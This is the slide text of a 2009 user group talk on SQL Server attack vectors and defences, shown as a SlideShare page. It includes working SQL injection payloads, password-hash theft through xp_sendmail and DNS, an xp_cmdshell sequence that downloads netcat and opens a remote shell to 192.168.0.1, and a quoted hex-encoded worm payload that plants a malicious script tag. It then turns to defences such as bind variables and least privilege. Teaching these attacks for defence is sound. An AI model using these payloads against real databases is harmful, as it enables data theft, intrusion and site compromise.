SlideShare a Scribd company logo

Think Like a Hacker - Database Attack Vectors

Mark Ginnebaugh
Mark Ginnebaugh

This document provides a summary of a presentation titled "Think Like A Hacker" about database attack vectors and techniques to thwart them. The presentation discusses common database hacking techniques such as SQL injection, unauthorized access via stolen or default credentials, and privilege escalation. It also outlines strategies for protecting databases, including applying patches, using secure coding practices with input validation and bind variables, limiting privileges, and encrypting sensitive data. The presentation emphasizes the importance of understanding hacking methods in order to strengthen database security.

1 of 44
Downloaded 396 times
“Think Like A Hacker” Database Attack Vectors and Techniques to Thwart Them Silicon Valley SQL Server User Group September 15, 2009 Mark Ginnebaugh, User Group Leader www.bayareasql.org
Presenters: Slavik Markovich Sudha Iyer CTO, Sentrigo Director, LogLogic
What’s This Presentation All About? Know your enemy Understand types of problems and exploits Common DB hacking techniques Explain how to avoid SQL injection problems Raising the bar for the hackers
What are database security threats? Databases hold volumes of sensitive data e.g. credit card numbers, financial results, bank records, billing information, intellectual property, customer lists, personal data … But: • Databases are not monitored • Seldom upgraded • Not patched This makes databases an easy target
Databases - The Crown Jewels Types of hacking by number of breaches * Types of hacking by number of breaches Unauthorized access via default or shared 17 / 53% credentials SQL Injection 16 / 79% Improperly Constrained or Misconfigured ACLs 9 / 66% Unauthorized access via Stolen Credentials 7 / 0.1% Authentication Bypass 5 / 0.1% Brute-Force 4 / 7% Privilege Escalations 4 / 0% Exploitation of Session Variables 3 / 0% Buffer Overflow 3 / 0% Cross-Site Scripting 1 / 0% * 2009 Verizon Data Breach Report
Some Examples Database breaches exist since the first DB SB 1386 (July 2003), a U.S. law mandating breach notification, made them public Over 130M credit and debit cards • Heartland Payment Systems Hannaford Brothers, 7-Eleven, T.J. Maxx, Barnes & Noble, BJ's Wholesale Club, Boston Market, DSW, Forever 21, Office Max and Sports Authority Many breaches remain undetected or not made public
Know Your Enemy Unauthorized access - not just hackers • Too many privileges Internal attacks • Disgruntled employees • Just trying to get the job done • Industrial espionage, Identity theft, etc. • Look around you!!!
The Problems Does a hacker need DBA access? Myriad of privileges • System level, Application level, Data access • Any privilege in the right circumstances can be an issue Other issues • Network issues, incorrect configuration • Too many features – large attack surface
The Problems Most typical problems of real world databases • Weak / default passwords for database accounts • Missing patches / patchsets – see http://en.wikipedia.org/wiki/SQL_slammer_ (computer_worm) • Unsecure customer / 3rd party code (T-SQL stored procedures)
Basic Hacking Techniques Reconnaissance: nmap - http://nmap.org/ SQLPing3 - http://sqlsecurity.com/
Basic Hacking Techniques Crack the passwords • Many brute force tools out there
Newly Released Vulnerability Use DBCC Bytes to read passwords from memory Never use SQL Server Native Authentication
Powerful Tools Are Easily Available
Basic Hacking – The Human Factor Wait for your DBA to go for a coffee break Go to his desktop Open Management Studio Add yourself as an administrator to the database of your choice This can be easily scripted and put on a USB drive
SQL Injection (from Wikipedia) • a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
SQL Injection Exists in any layer of any application • C/S and Web Applications • Stored program units Build in User created Has many forms • Extra queries, unions, order by, sub selects Easily avoided • Bind variables, strong typing
SQL Injection Types In band – Use injection to return extra data • Part of normal result set (unions) • In error messages Out of band – Use alternative route like UTL_HTTP, DNS to extract data Blind / Inference – No data is returned but the hacker is able to infer the data using return codes, error codes, timing measurements and more
SQL Injection In-band select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; select name, password from sys.syslogins where password is not null 1 14417807 1209 adventure-worksguy1 16 Production Technician - WC60 1972-05-15 00:00:00.000 M M 1996- 07-31 00:00:00.000 0 21 30 1 AAE1D04A-C237- 4974-B4D5-935247737718 2004-07-31 00:00:00.000 2 sa 虀뛎◌豕醜‫ߨᦉﬥ‬ 㾋㴼绳ᦉ 3 test ꍮᒬᦉᦉ쵌藌 街Ḷ왏 컕 Now, just attack the password hash using either using brute-force or dictionary.
SQL Injection In-Band Using errors – inject the following: 1 and 1 in (select @@version) Result is: Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2) to data type int.
SQL Injection Out-of-band Send information via HTTP/SMTP/DNS to an external site: select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=N'slavik@sentrigo.com', @query = N'select user, password from sys.syslogins where password is not null' ; Same can be done with DNS access – no one blocks this… Search for DNS-Request: www.8A8F025737A9097A.sentrigo.com and collect the logs from the DNS server
Blind SQL Injection Example code: If is_srvrolemember('sysdamin') > 0) waitfor delay '0:0:5' If (ascii(substring(@string, @byte, 1)) & (power(2, @bit))) > 0 waitfor '0:0:5'
SQL Injection – Web Application Username = ' or 1=1 -- The original statement looked like: 'select * from users where username = ''' + username + ''' and password = ''' + password + '''' The result = select * from users where username = '' or 1=1 --' and password = ''
Start The Attack Use a single quote as the username: select * from users where username = ''' and password = '' Msg 105, Level 15, State 1, Line 1 Unclosed quotation mark after the character string '' '. Msg 102, Level 15, State 1, Line 1 Incorrect syntax near '' '.
Let’s Find More Data Add an invalid username – ' having 1=1— select * from users where username = '' having 1=1 -- and password = '' Msg 8120, Level 16, State 1, Line 1 Column 'users.name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
Let’s Find More Data – Part II Find out other columns by adding ' group by users.username having 1=1 -- select * from users where username = '' group by users.username having 1=1 -- and password = '' Msg 8120, Level 16, State 1, Line 1 Column 'users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
Now, Add Some Data From Table Pass in – '; insert into users (username, password) values ('haxor', 'p0wned') -- select * from users where username = ''; insert into users (username, password) values ('haxor', 'p0wned') -- and password = ''
Or, Get Some Data Pass in – ' union select min(username) from users where username > 'a' -- select * from users where username = '' union select min(username) from users where username > 'a' -- and password = '' Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the nvarchar value 'admin' to data type int.
Now We Can Enumerate All Users Pass in the resulting user in a loop – ' union select min(username) from users where username > 'admin' – Now, select the password for admin – ' or 1 in (select password from users where username = 'admin') -- Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the varchar value 'xxxxx' to data type int.
System Level Attacks Well, we all know about xp_cmdshell Pass in – '; exec master..xp_cmdshell 'dir > c:dir.txt' – Payload can be: 'nslookup attacker_machine' to signal to the attacker that attack succeeded 'tftp –I 192.168.0.1 GET nc.exe c:nc.exe' – Now we have something to work with 'C:nc.exe 192.168.0.1 53 –e cmd.exe' – Let's start a remote command shell
Real World Example Mass SQL worm in the wild since April 08 Enumerates all input fields and tries various SQL injection techniques Iterates on all text fields in the database and adds a call to a malicious script
Real World Example SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0×4445434C415245204054205641524348415228323535292C404320564152434 841522832353529204445434C415245205461626C655F437572736F7220435552534F5220 464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6 563747320612C737973636F6C756D6E73206220574845524520612E69643D622E69642041 4E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E7 8747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2 05461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443 485F5354415455533D302920424547494E20455845432827555044415445205B272B40542 B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841 522834303030292C5B272B40432B275D29292B27273C736372697074207372633D6874747 03A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F7363726970743E27272729 204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F20405 42C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154 45205461626C655F437572736F7220 AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC Wow, how to read this?
Real World Example DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(’UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+”<script src=http://www.chkadw.com/b.js></script>”’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Real World Example The interesting part is here: ’UPDATE ['SOME_TABLE'] SET ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR( 4000),['SOME_TEXT_COL']))+”<script src=http://www.chkadw.com/b.js></script>”’ This is why you should use NoScript even for trusted sites
Protecting Your Database Think like a hacker • Learn about exploits • Always look for security issues Configuration, permissions, bugs Learn and use available tools • nmap, Metasploit, Wireshark, Hydra, Cryptool, SQLPing, Passwordizer, etc.
Protecting Your Database Apply patch sets and upgrades • Easier said than done Check for default and weak passwords regularly Secure the network • Valid node checking + firewall • Use encryption
Protecting Your Database Install only what you use, remove all else • Reduce your attack surface The least privilege principle • Lock down packages System access, file access, network access Encrypt critical data Use secure coding techniques • Bind variables, input validation • Clear ownership of security issues
Bind Variables – Java Statement stmt = conn.createStatement(); ResultSet rs = stmt.executeQuery( "select * from users where username = '" + username + "'"; vs. PreparedStatement pstmt = conn.prepareStatement("select * from users where username = ?"); pstmt.setString(1, username); ResultSet rs = pstmt.executeQuery();
Bind Variables - ASP Dim rsQuery Set rsQuery = Server.CreateObject("ADODB.Recordset") rsQuery.ActiveConnection = xxx rsQuery.Source = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'" rsQuery.CursorType = 0 rsQuery.CursorLocation = 2 rsQuery.LockType = 1 rsQuery.Open() VS. Dim rsQuery rsQuery = Server.CreateObject ("ADODB.Command") rsQuery.ActiveConnection = xxx rsQuery.CommandText = "SELECT * FROM users WHERE username = ? AND password = ?" rsQuery.Parameters.Append rsQuery.CreateParameter("username", 200, 1, 50, username) rsQuery.Parameters.Append rsQuery.CreateParameter("password", 200, 1, 50, password) rsQuery.Prepared = True Set rsResult = rsQuery.Execute
Secure Coding Policies Setup secure coding policies for the different languages Make the coding policies part of every contract – external and internal Default document for all developers OWASP
Some Coding Rules Avoid hardcoding username/password Use full qualified names for function and procedure calls Always validate user/database input Be careful with dynamic statements (Cursors, SQL- Statements, …) Be careful with file access Be careful with OS command execution
LogLogic Database Security Manager Host-based Sensor Technology In-Depth Activity Monitoring Granular Policy-based Detection Integrated Prevention Capabilities Real-Time Virtual Patching Compliance Reporting and Forensics Appliance-based Solution
Integrated Solution LogLogic Database Security Manager LogLogic Open Log Management » Granular policy-based detection » Compliance reporting » Integrated prevention capabilities » Long term archival » Real-time virtual patching » Forensics analysis
Questions?
www.bayareasql.org To attend our meetings or inquire about speaking opportunities, please contact: Mark Ginnebaugh, User Group Leader mark@designmind.com

Recommended

Hardening Database Server
Hardening Database ServerHardening Database Server
Hardening Database Server
Fahri Firdausillah
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdf
slametarrokhim1
 
SQL injection
SQL injectionSQL injection
SQL injection
Raj Parmar
 
Cryptography
CryptographyCryptography
Cryptography
okolo chukwudumebi prince
 
Kriptoloji
KriptolojiKriptoloji
Kriptoloji
Şammas Çölkesen
 
Symmetric & Asymmetric Cryptography
Symmetric & Asymmetric CryptographySymmetric & Asymmetric Cryptography
Symmetric & Asymmetric Cryptography
chauhankapil
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
Blueinfy Solutions
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanning
amiable_indian
 
Şifreleme Teknikleri ve SSL
Şifreleme Teknikleri ve SSLŞifreleme Teknikleri ve SSL
Şifreleme Teknikleri ve SSL
Tolga ÇELİK
 
Bug bounty
Bug bountyBug bounty
Bug bounty
n|u - The Open Security Community
 
Hardening usuarios smartfense
Hardening usuarios smartfenseHardening usuarios smartfense
Hardening usuarios smartfense
CSA Argentina
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Anatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesAnatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilities
DaveEdwards12
 
Overview on hacking tools
Overview on hacking toolsOverview on hacking tools
Overview on hacking tools
ZituSahu
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and Tools
Yulian Slobodyan
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
DES (Data Encryption Standard) pressentation
DES (Data Encryption Standard) pressentationDES (Data Encryption Standard) pressentation
DES (Data Encryption Standard) pressentation
sarhadisoftengg
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...
Codemotion
 
Cryptography
CryptographyCryptography
Cryptography
Pratiksha Patil
 
Secure coding-guidelines
Secure coding-guidelinesSecure coding-guidelines
Secure coding-guidelines
Trupti Shiralkar, CISSP
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
CrowdStrike
 
Network attacks
Network attacksNetwork attacks
Network attacks
Manjushree Mashal
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Jannis Kirschner
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
Amit Dubey
 
RSA Algorithm
RSA AlgorithmRSA Algorithm
RSA Algorithm
Joon Young Park
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Backtrack syllabus
Backtrack syllabusBacktrack syllabus
Backtrack syllabus
napoleon182
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
Fatih Ozavci
 

More Related Content

What's hot (20)

Şifreleme Teknikleri ve SSL
Şifreleme Teknikleri ve SSLŞifreleme Teknikleri ve SSL
Şifreleme Teknikleri ve SSL
Tolga ÇELİK
 
Bug bounty
Bug bountyBug bounty
Bug bounty
n|u - The Open Security Community
 
Hardening usuarios smartfense
Hardening usuarios smartfenseHardening usuarios smartfense
Hardening usuarios smartfense
CSA Argentina
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Anatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesAnatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilities
DaveEdwards12
 
Overview on hacking tools
Overview on hacking toolsOverview on hacking tools
Overview on hacking tools
ZituSahu
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and Tools
Yulian Slobodyan
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
DES (Data Encryption Standard) pressentation
DES (Data Encryption Standard) pressentationDES (Data Encryption Standard) pressentation
DES (Data Encryption Standard) pressentation
sarhadisoftengg
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...
Codemotion
 
Cryptography
CryptographyCryptography
Cryptography
Pratiksha Patil
 
Secure coding-guidelines
Secure coding-guidelinesSecure coding-guidelines
Secure coding-guidelines
Trupti Shiralkar, CISSP
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
CrowdStrike
 
Network attacks
Network attacksNetwork attacks
Network attacks
Manjushree Mashal
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Jannis Kirschner
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
Amit Dubey
 
RSA Algorithm
RSA AlgorithmRSA Algorithm
RSA Algorithm
Joon Young Park
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Şifreleme Teknikleri ve SSL
Şifreleme Teknikleri ve SSLŞifreleme Teknikleri ve SSL
Şifreleme Teknikleri ve SSL
Tolga ÇELİK
 
Bug bounty
Bug bountyBug bounty
Bug bounty
n|u - The Open Security Community
 
Hardening usuarios smartfense
Hardening usuarios smartfenseHardening usuarios smartfense
Hardening usuarios smartfense
CSA Argentina
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Anatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesAnatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilities
DaveEdwards12
 
Overview on hacking tools
Overview on hacking toolsOverview on hacking tools
Overview on hacking tools
ZituSahu
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and Tools
Yulian Slobodyan
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
DES (Data Encryption Standard) pressentation
DES (Data Encryption Standard) pressentationDES (Data Encryption Standard) pressentation
DES (Data Encryption Standard) pressentation
sarhadisoftengg
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...
Codemotion
 
Cryptography
CryptographyCryptography
Cryptography
Pratiksha Patil
 
Secure coding-guidelines
Secure coding-guidelinesSecure coding-guidelines
Secure coding-guidelines
Trupti Shiralkar, CISSP
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
CrowdStrike
 
Network attacks
Network attacksNetwork attacks
Network attacks
Manjushree Mashal
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Jannis Kirschner
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
Amit Dubey
 
RSA Algorithm
RSA AlgorithmRSA Algorithm
RSA Algorithm
Joon Young Park
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 

Viewers also liked (6)

Backtrack syllabus
Backtrack syllabusBacktrack syllabus
Backtrack syllabus
napoleon182
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
Fatih Ozavci
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 Workshop
Fatih Ozavci
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco Phones
Fatih Ozavci
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP
Fatih Ozavci
 
VoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers AwakenVoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers Awaken
Fatih Ozavci
 
Backtrack syllabus
Backtrack syllabusBacktrack syllabus
Backtrack syllabus
napoleon182
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
Fatih Ozavci
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 Workshop
Fatih Ozavci
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco Phones
Fatih Ozavci
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP
Fatih Ozavci
 
VoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers AwakenVoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers Awaken
Fatih Ozavci
 

Similar to Think Like a Hacker - Database Attack Vectors (20)

OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10
Robert MacLean
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
fangjiafu
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzing
G Prachi
 
Sql injection
Sql injectionSql injection
Sql injection
Nuruzzaman Milon
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
Kevin Kline
 
Code securely
Code securelyCode securely
Code securely
Maksym Hopei
 
Security Training: #4 Development: Typical Security Issues
Security Training: #4 Development: Typical Security IssuesSecurity Training: #4 Development: Typical Security Issues
Security Training: #4 Development: Typical Security Issues
Yulian Slobodyan
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
Zakaria SMAHI
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Grand Parade Poland
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
Hina Rawal
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
ZIONSECURITY
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackAn Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
 
Code injection
Code injectionCode injection
Code injection
Gayatri Patel
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
Darin Fredde
 
Web security
Web securityWeb security
Web security
dogangcr
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
 
Web security uploadv1
Web security uploadv1Web security uploadv1
Web security uploadv1
Setia Juli Irzal Ismail
 
OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10
Robert MacLean
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
fangjiafu
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzing
G Prachi
 
Sql injection
Sql injectionSql injection
Sql injection
Nuruzzaman Milon
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
Kevin Kline
 
Code securely
Code securelyCode securely
Code securely
Maksym Hopei
 
Security Training: #4 Development: Typical Security Issues
Security Training: #4 Development: Typical Security IssuesSecurity Training: #4 Development: Typical Security Issues
Security Training: #4 Development: Typical Security Issues
Yulian Slobodyan
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
Zakaria SMAHI
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Grand Parade Poland
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
Hina Rawal
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
ZIONSECURITY
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackAn Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
 
Code injection
Code injectionCode injection
Code injection
Gayatri Patel
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
Darin Fredde
 
Web security
Web securityWeb security
Web security
dogangcr
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
 
Web security uploadv1
Web security uploadv1Web security uploadv1
Web security uploadv1
Setia Juli Irzal Ismail
 

More from Mark Ginnebaugh (20)

Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015
Mark Ginnebaugh
 
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Mark Ginnebaugh
 
Platfora - An Analytics Sandbox In A World Of Big Data
Platfora - An Analytics Sandbox In A World Of Big DataPlatfora - An Analytics Sandbox In A World Of Big Data
Platfora - An Analytics Sandbox In A World Of Big Data
Mark Ginnebaugh
 
Microsoft SQL Server Relational Databases and Primary Keys
Microsoft SQL Server Relational Databases and Primary KeysMicrosoft SQL Server Relational Databases and Primary Keys
